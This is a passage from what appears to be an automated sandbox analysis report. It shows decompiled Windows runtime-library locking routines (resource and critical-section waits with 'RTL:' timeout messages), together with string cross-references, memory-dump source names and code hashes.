									_t92 =  !( ~( *(_t64 + 0x30) & 1)) & 0x00d501c0;
									_push(_t92);
									_push(0);
									_t37 = E00C6F8CC( *((intOrPtr*)(_t64 + 0x20)));
									__eflags = _t37 - 0x102;
									if(_t37 != 0x102) {
										break;
									}
									_t71 =  *(_t92 + 4);
									_t85 =  *_t92;
									_t51 = E00CB4FC0(_t85, _t71, 0xff676980, 0xffffffff);
									_push(_t85);
									_push(_t51);
									E00CC3F92(0x65, 0, "RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)\n", _t86);
									E00CC3F92(0x65, 0, "RTL: Resource at %p\n", _t64);
									_t86 = _t86 + 1;
									_t105 = _t104 + 0x28;
									__eflags = _t86 - 2;
									if(__eflags > 0) {
										E00CF217A(_t71, __eflags, _t64);
									}
									_push("RTL: Re-Waiting\n");
									_push(0);
									_push(0x65);
									E00CC3F92();
									_t104 = _t105 + 0xc;
								}
								__eflags = _t37;
								if(__eflags < 0) {
									_push(_t37);
									E00CB3915(_t64, _t71, _t81, _t86, _t92, __eflags);
									asm("int3");
									_t40 =  *_t71;
									 *_t71 = 0;
									__eflags = _t40;
									if(_t40 == 0) {
										L1:
										_t42 = E00C95384(_t92 + 0x24);
										if(_t42 != 0) {
											goto L31;
										} else {
											goto L2;
										}
									} else {
										_t83 =  *((intOrPtr*)(_t92 + 0x18));
										_push( &_a4);
										_push(_t40);
										_t49 = E00C6F970( *((intOrPtr*)(_t92 + 0x18)));
										__eflags = _t49;
										if(__eflags >= 0) {
											goto L1;
										} else {
											_push(_t49);
											E00CB3915(_t64,  &_a4, _t83, _t86, _t92, __eflags);
											L31:
											_t82 =  *((intOrPtr*)(_t92 + 0x20));
											_push( &_a4);
											_push(1);
											_t42 = E00C6F970( *((intOrPtr*)(_t92 + 0x20)));
											__eflags = _t42;
											if(__eflags >= 0) {
												L2:
												return _t42;
											} else {
												_push(_t42);
												E00CB3915(_t64,  &_a4, _t82, _t86, _t92, __eflags);
												_t73 =  *((intOrPtr*)(_t92 + 0x20));
												_push( &_a4);
												_push(1);
												_t42 = E00C6F970( *((intOrPtr*)(_t92 + 0x20)));
												__eflags = _t42;
												if(__eflags >= 0) {
													goto L2;
												} else {
													_push(_t42);
													_t45 = E00CB3915(_t64, _t73, _t82, _t86, _t92, __eflags);
													asm("int3");
													while(1) {
														_t74 = _t45;
														__eflags = _t45 - 1;
														if(_t45 != 1) {
															break;
														}
														_t86 = _t86 | 0xffffffff;
														_t45 = _t74;
														asm("lock cmpxchg [ebx], edi");
														__eflags = _t45 - _t74;
														if(_t45 != _t74) {
															continue;
														} else {
															_t46 =  *[fs:0x18];
															 *((intOrPtr*)(_t92 + 0x2c)) =  *((intOrPtr*)(_t46 + 0x24));
															return _t46;
														}
														goto L37;
													}
													E00C95329(_t74, _t92);
													_push(1);
													return E00C953A5(_t92);
												}
											}
										}
									}
								} else {
									_t32 =  *(_t64 + 0x28);
									continue;
								}
							} else {
								_t71 =  *_t79;
								__eflags = _t71;
								if(__eflags > 0) {
									while(1) {
										_t57 = _t71;
										asm("lock cmpxchg [edi], esi");
										__eflags = _t57 - _t71;
										if(_t57 == _t71) {
											break;
										}
										_t71 = _t57;
										__eflags = _t57;
										if(_t57 > 0) {
											continue;
										}
										break;
									}
									_t32 = _a4;
									__eflags = _t71;
								}
								if(__eflags != 0) {
									continue;
								} else {
									goto L19;
								}
							}
						}
						goto L37;
					}
					_t71 = _t71 | 0xffffffff;
					_t32 = 0;
					asm("lock cmpxchg [edx], ecx");
					__eflags = 0;
					if(0 != 0) {
						goto L4;
					} else {
						 *((intOrPtr*)(_t64 + 0x2c)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
						return 1;
					}
				}
				L37:
			}

























                                                0x00c953ab
                                                0x00c953ae
                                                0x00c953b1
                                                0x00c953b4
                                                0x00c953b7
                                                0x00cb05b6
                                                0x00cb05c0
                                                0x00cb05c3
                                                0x00000000
                                                0x00cb05c9
                                                0x00cb05c9
                                                0x00cb05cc
                                                0x00cb05d5
                                                0x00cb05d5
                                                0x00c953bd
                                                0x00c953bd
                                                0x00c953bd
                                                0x00c953be
                                                0x00c953be
                                                0x00c953be
                                                0x00c953c0
                                                0x00000000
                                                0x00000000
                                                0x00cd2269
                                                0x00cd226d
                                                0x00cd2349
                                                0x00cd234d
                                                0x00cd2273
                                                0x00cd2276
                                                0x00cd2279
                                                0x00cd227e
                                                0x00cd2283
                                                0x00cd2287
                                                0x00cd228a
                                                0x00cd228d
                                                0x00cd228f
                                                0x00cd22bc
                                                0x00cd22bc
                                                0x00cd22bc
                                                0x00cd22be
                                                0x00cd22c4
                                                0x00cd22cc
                                                0x00cd22d0
                                                0x00cd22d6
                                                0x00cd22d7
                                                0x00cd22da
                                                0x00cd22df
                                                0x00cd22e4
                                                0x00000000
                                                0x00000000
                                                0x00cd22e6
                                                0x00cd22e9
                                                0x00cd22f4
                                                0x00cd22f9
                                                0x00cd22fa
                                                0x00cd2305
                                                0x00cd2314
                                                0x00cd2319
                                                0x00cd231a
                                                0x00cd231d
                                                0x00cd2320
                                                0x00cd2323
                                                0x00cd2323
                                                0x00cd2328
                                                0x00cd232d
                                                0x00cd232f
                                                0x00cd2331
                                                0x00cd2336
                                                0x00cd2336
                                                0x00cd233b
                                                0x00cd233d
                                                0x00cd2350
                                                0x00cd2351
                                                0x00cd2356
                                                0x00cd2359
                                                0x00cd2359
                                                0x00cd235b
                                                0x00cd235d
                                                0x00c95367
                                                0x00c9536b
                                                0x00c95372
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00cd2363
                                                0x00cd2363
                                                0x00cd2369
                                                0x00cd236a
                                                0x00cd236c
                                                0x00cd2371
                                                0x00cd2373
                                                0x00000000
                                                0x00cd2379
                                                0x00cd2379
                                                0x00cd237a
                                                0x00cd237f
                                                0x00cd237f
                                                0x00cd2385
                                                0x00cd2386
                                                0x00cd2389
                                                0x00cd238e
                                                0x00cd2390
                                                0x00c95378
                                                0x00c9537c
                                                0x00cd2396
                                                0x00cd2396
                                                0x00cd2397
                                                0x00cd239c
                                                0x00cd23a2
                                                0x00cd23a3
                                                0x00cd23a6
                                                0x00cd23ab
                                                0x00cd23ad
                                                0x00000000
                                                0x00cd23b3
                                                0x00cd23b3
                                                0x00cd23b4
                                                0x00cd23b9
                                                0x00cd23ba
                                                0x00cd23ba
                                                0x00cd23bc
                                                0x00cd23bf
                                                0x00000000
                                                0x00000000
                                                0x00cc9153
                                                0x00cc9158
                                                0x00cc915a
                                                0x00cc915e
                                                0x00cc9160
                                                0x00000000
                                                0x00cc9166
                                                0x00cc9166
                                                0x00cc9171
                                                0x00cc9176
                                                0x00cc9176
                                                0x00000000
                                                0x00cc9160
                                                0x00cd23c6
                                                0x00cd23cb
                                                0x00cd23d7
                                                0x00cd23d7
                                                0x00cd23ad
                                                0x00cd2390
                                                0x00cd2373
                                                0x00cd233f
                                                0x00cd233f
                                                0x00000000
                                                0x00cd233f
                                                0x00cd2291
                                                0x00cd2291
                                                0x00cd2293
                                                0x00cd2295
                                                0x00cd229a
                                                0x00cd22a1
                                                0x00cd22a3
                                                0x00cd22a7
                                                0x00cd22a9
                                                0x00000000
                                                0x00000000
                                                0x00cd22ab
                                                0x00cd22ad
                                                0x00cd22af
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00cd22af
                                                0x00cd22b1
                                                0x00cd22b4
                                                0x00cd22b4
                                                0x00cd22b6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00cd22b6
                                                0x00cd228f
                                                0x00000000
                                                0x00cd226d
                                                0x00c953cb
                                                0x00c953ce
                                                0x00c953d0
                                                0x00c953d4
                                                0x00c953d6
                                                0x00000000
                                                0x00c953d8
                                                0x00c953e3
                                                0x00c953ea
                                                0x00c953ea
                                                0x00c953d6
                                                0x00000000

                                                APIs
                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00CD22F4
                                                Strings
                                                • RTL: Resource at %p, xrefs: 00CD230B
                                                • RTL: Acquire Exclusive Sem Timeout %d (%I64u secs), xrefs: 00CD22FC
                                                • RTL: Re-Waiting, xrefs: 00CD2328
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                                • String ID: RTL: Acquire Exclusive Sem Timeout %d (%I64u secs)$RTL: Re-Waiting$RTL: Resource at %p
                                                • API String ID: 885266447-871070163
                                                • Opcode ID: d8b41d7780ab7404d81e3290bd20f2d1d439a4da41b6dd481fb06d0c6ecd3fc6
                                                • Instruction ID: cab12f6b42d5bf86dbfac65b3bbf975951f4bb98bea98ea74c7a48317a8fc6ca
                                                • Opcode Fuzzy Hash: d8b41d7780ab7404d81e3290bd20f2d1d439a4da41b6dd481fb06d0c6ecd3fc6
                                                • Instruction Fuzzy Hash: 55510571600B066BDF159F68DC85FA6739CEF54360F10422AFE18DB291EA61ED4297A0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00C9EC56, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 145COMMON
                                                Download Yara Rule
                                                C-Code - Quality: 51%
                                                			E00C9EC56(void* __ecx, void* __edx, intOrPtr* __edi, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				signed int _v36;
				intOrPtr _v40;
				short _v66;
				char _v72;
				void* __esi;
				intOrPtr _t38;
				intOrPtr _t39;
				signed int _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t44;
				void* _t46;
				intOrPtr _t48;
				signed int _t49;
				intOrPtr _t50;
				intOrPtr _t53;
				signed char _t67;
				void* _t72;
				intOrPtr _t77;
				intOrPtr* _t80;
				intOrPtr _t84;
				intOrPtr* _t85;
				void* _t91;
				void* _t92;
				void* _t93;

				_t80 = __edi;
				_t75 = __edx;
				_t70 = __ecx;
				_t84 = _a4;
				if( *((intOrPtr*)(_t84 + 0x10)) == 0) {
					E00C8DA92(__ecx, __edx, __eflags, _t84);
					_t38 =  *((intOrPtr*)(_t84 + 0x10));
				}
				_push(0);
				__eflags = _t38 - 0xffffffff;
				if(_t38 == 0xffffffff) {
					_t39 =  *0xd5793c; // 0x0
					_push(0);
					_push(_t84);
					_t40 = E00C716C0(_t39);
				} else {
					_t40 = E00C6F9D4(_t38);
				}
				_pop(_t85);
				__eflags = _t40;
				if(__eflags < 0) {
					_push(_t40);
					E00CB3915(_t67, _t70, _t75, _t80, _t85, __eflags);
					asm("int3");
					while(1) {
						L21:
						_t76 =  *[fs:0x18];
						_t42 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
						__eflags =  *(_t42 + 0x240) & 0x00000002;
						if(( *(_t42 + 0x240) & 0x00000002) != 0) {
							_v36 =  *(_t85 + 0x14) & 0x00ffffff;
							_v66 = 0x1722;
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_t76 =  &_v72;
							_push( &_v72);
							_v28 = _t85;
							_v40 =  *((intOrPtr*)(_t85 + 4));
							_v32 =  *((intOrPtr*)(_t85 + 0xc));
							_push(0x10);
							_push(0x20402);
							E00C701A4( *0x7ffe0382 & 0x000000ff);
						}
						while(1) {
							_t43 = _v8;
							_push(_t80);
							_push(0);
							__eflags = _t43 - 0xffffffff;
							if(_t43 == 0xffffffff) {
								_t71 =  *0xd5793c; // 0x0
								_push(_t85);
								_t44 = E00C71F28(_t71);
							} else {
								_t44 = E00C6F8CC(_t43);
							}
							__eflags = _t44 - 0x102;
							if(_t44 != 0x102) {
								__eflags = _t44;
								if(__eflags < 0) {
									_push(_t44);
									E00CB3915(_t67, _t71, _t76, _t80, _t85, __eflags);
									asm("int3");
									E00CF2306(_t85);
									__eflags = _t67 & 0x00000002;
									if((_t67 & 0x00000002) != 0) {
										_t7 = _t67 + 2; // 0x4
										_t72 = _t7;
										asm("lock cmpxchg [edi], ecx");
										__eflags = _t67 - _t67;
										if(_t67 == _t67) {
											E00C9EC56(_t72, _t76, _t80, _t85);
										}
									}
									return 0;
								} else {
									__eflags = _v24;
									if(_v24 != 0) {
										 *((intOrPtr*)(_v12 + 0xf84)) = 0;
									}
									return 2;
								}
								goto L36;
							}
							_t77 =  *((intOrPtr*)(_t80 + 4));
							_push(_t67);
							_t46 = E00CB4FC0( *_t80, _t77, 0xff676980, 0xffffffff);
							_push(_t77);
							E00CC3F92(0x65, 1, "RTL: Enter Critical Section Timeout (%I64u secs) %d\n", _t46);
							_t48 =  *_t85;
							_t92 = _t91 + 0x18;
							__eflags = _t48 - 0xffffffff;
							if(_t48 == 0xffffffff) {
								_t49 = 0;
								__eflags = 0;
							} else {
								_t49 =  *((intOrPtr*)(_t48 + 0x14));
							}
							_t71 =  *((intOrPtr*)(_t85 + 0xc));
							_push(_t49);
							_t50 = _v12;
							_t76 =  *((intOrPtr*)(_t50 + 0x24));
							_push(_t85);
							_push( *((intOrPtr*)(_t85 + 0xc)));
							_push( *((intOrPtr*)(_t50 + 0x24)));
							E00CC3F92(0x65, 0, "RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu\n",  *((intOrPtr*)(_t50 + 0x20)));
							_t53 =  *_t85;
							_t93 = _t92 + 0x20;
							_t67 = _t67 + 1;
							__eflags = _t53 - 0xffffffff;
							if(_t53 != 0xffffffff) {
								_t71 =  *((intOrPtr*)(_t53 + 0x14));
								_a4 =  *((intOrPtr*)(_t53 + 0x14));
							}
							__eflags = _t67 - 2;
							if(_t67 > 2) {
								__eflags = _t85 - 0xd520c0;
								if(_t85 != 0xd520c0) {
									_t76 = _a4;
									__eflags = _a4 - _a8;
									if(__eflags == 0) {
										E00CF217A(_t71, __eflags, _t85);
									}
								}
							}
							_push("RTL: Re-Waiting\n");
							_push(0);
							_push(0x65);
							_a8 = _a4;
							E00CC3F92();
							_t91 = _t93 + 0xc;
							__eflags =  *0x7ffe0382;
							if( *0x7ffe0382 != 0) {
								goto L21;
							}
						}
						goto L36;
					}
				} else {
					return _t40;
				}
				L36:
			}

































                                                0x00c9ec56
                                                0x00c9ec56
                                                0x00c9ec56
                                                0x00c9ec5c
                                                0x00c9ec64
                                                0x00cd23e6
                                                0x00cd23eb
                                                0x00cd23eb
                                                0x00c9ec6a
                                                0x00c9ec6c
                                                0x00c9ec6f
                                                0x00cd23f3
                                                0x00cd23f8
                                                0x00cd23fa
                                                0x00cd23fc
                                                0x00c9ec75
                                                0x00c9ec76
                                                0x00c9ec76
                                                0x00c9ec7b
                                                0x00c9ec7c
                                                0x00c9ec7e
                                                0x00cd2406
                                                0x00cd2407
                                                0x00cd240c
                                                0x00cd240d
                                                0x00cd240d
                                                0x00cd240d
                                                0x00cd2414
                                                0x00cd2417
                                                0x00cd241e
                                                0x00cd2435
                                                0x00cd2438
                                                0x00cd243c
                                                0x00cd243f
                                                0x00cd2442
                                                0x00cd2443
                                                0x00cd2446
                                                0x00cd2449
                                                0x00cd2453
                                                0x00cd2455
                                                0x00cd245b
                                                0x00cd245b
                                                0x00c9eb99
                                                0x00c9eb99
                                                0x00c9eb9c
                                                0x00c9eb9d
                                                0x00c9eb9f
                                                0x00c9eba2
                                                0x00cd2465
                                                0x00cd246b
                                                0x00cd246d
                                                0x00c9eba8
                                                0x00c9eba9
                                                0x00c9eba9
                                                0x00c9ebae
                                                0x00c9ebb3
                                                0x00c9ebb9
                                                0x00c9ebbb
                                                0x00cd2513
                                                0x00cd2514
                                                0x00cd2519
                                                0x00cd251b
                                                0x00c9ec2a
                                                0x00c9ec2d
                                                0x00c9ec33
                                                0x00c9ec36
                                                0x00c9ec3a
                                                0x00c9ec3e
                                                0x00c9ec40
                                                0x00c9ec47
                                                0x00c9ec47
                                                0x00c9ec40
                                                0x00c722c6
                                                0x00c9ebc1
                                                0x00c9ebc1
                                                0x00c9ebc5
                                                0x00c9ec9a
                                                0x00c9ec9a
                                                0x00c9ebd6
                                                0x00c9ebd6
                                                0x00000000
                                                0x00c9ebbb
                                                0x00cd2477
                                                0x00cd247c
                                                0x00cd2486
                                                0x00cd248b
                                                0x00cd2496
                                                0x00cd249b
                                                0x00cd249d
                                                0x00cd24a0
                                                0x00cd24a3
                                                0x00cd24aa
                                                0x00cd24aa
                                                0x00cd24a5
                                                0x00cd24a5
                                                0x00cd24a5
                                                0x00cd24ac
                                                0x00cd24af
                                                0x00cd24b0
                                                0x00cd24b3
                                                0x00cd24b9
                                                0x00cd24ba
                                                0x00cd24bb
                                                0x00cd24c6
                                                0x00cd24cb
                                                0x00cd24cd
                                                0x00cd24d0
                                                0x00cd24d1
                                                0x00cd24d4
                                                0x00cd24d6
                                                0x00cd24d9
                                                0x00cd24d9
                                                0x00cd24dc
                                                0x00cd24df
                                                0x00cd24e1
                                                0x00cd24e7
                                                0x00cd24e9
                                                0x00cd24ec
                                                0x00cd24ef
                                                0x00cd24f2
                                                0x00cd24f2
                                                0x00cd24ef
                                                0x00cd24e7
                                                0x00cd24fa
                                                0x00cd24ff
                                                0x00cd2501
                                                0x00cd2503
                                                0x00cd2506
                                                0x00cd250b
                                                0x00c9eb8c
                                                0x00c9eb93
                                                0x00000000
                                                0x00000000
                                                0x00c9eb93
                                                0x00000000
                                                0x00c9eb99
                                                0x00c9ec85
                                                0x00c9ec85
                                                0x00c9ec85
                                                0x00000000

                                                Strings
                                                • RTL: Enter Critical Section Timeout (%I64u secs) %d, xrefs: 00CD248D
                                                • RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu, xrefs: 00CD24BD
                                                • RTL: Re-Waiting, xrefs: 00CD24FA
                                                Memory Dump Source
                                                • Source File: 00000008.00000002.698278998.0000000000C60000.00000040.00000001.sdmp, Offset: 00C50000, based on PE: true
                                                • Associated: 00000008.00000002.698270211.0000000000C50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698400307.0000000000D40000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698411864.0000000000D50000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698421886.0000000000D54000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698435583.0000000000D57000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698444149.0000000000D60000.00000040.00000001.sdmp Download File
                                                • Associated: 00000008.00000002.698493714.0000000000DC0000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID: RTL: Enter Critical Section Timeout (%I64u secs) %d$RTL: Pid.Tid %x.%x, owner tid %x Critical Section %p - ContentionCount == %lu$RTL: Re-Waiting
                                                • API String ID: 0-3177188983
                                                • Opcode ID: 2dc3c9cf46c9b76998a1ca9f5d0fdd6d5af3bd34d70dd9e6d01dee7756bbe67c
                                                • Instruction ID: 45221ccde62c594bba6a8f2859c73c54296570d041c88568b0969182f6105a33
                                                • Opcode Fuzzy Hash: 2dc3c9cf46c9b76998a1ca9f5d0fdd6d5af3bd34d70dd9e6d01dee7756bbe67c
                                                • Instruction Fuzzy Hash: 62412C70600304ABCB24DF68DC89F6A77A8EF44720F20C616FA69D73C1D734EA419B60
                                                Uniqueness

                                                Uniqueness Score: -1.00%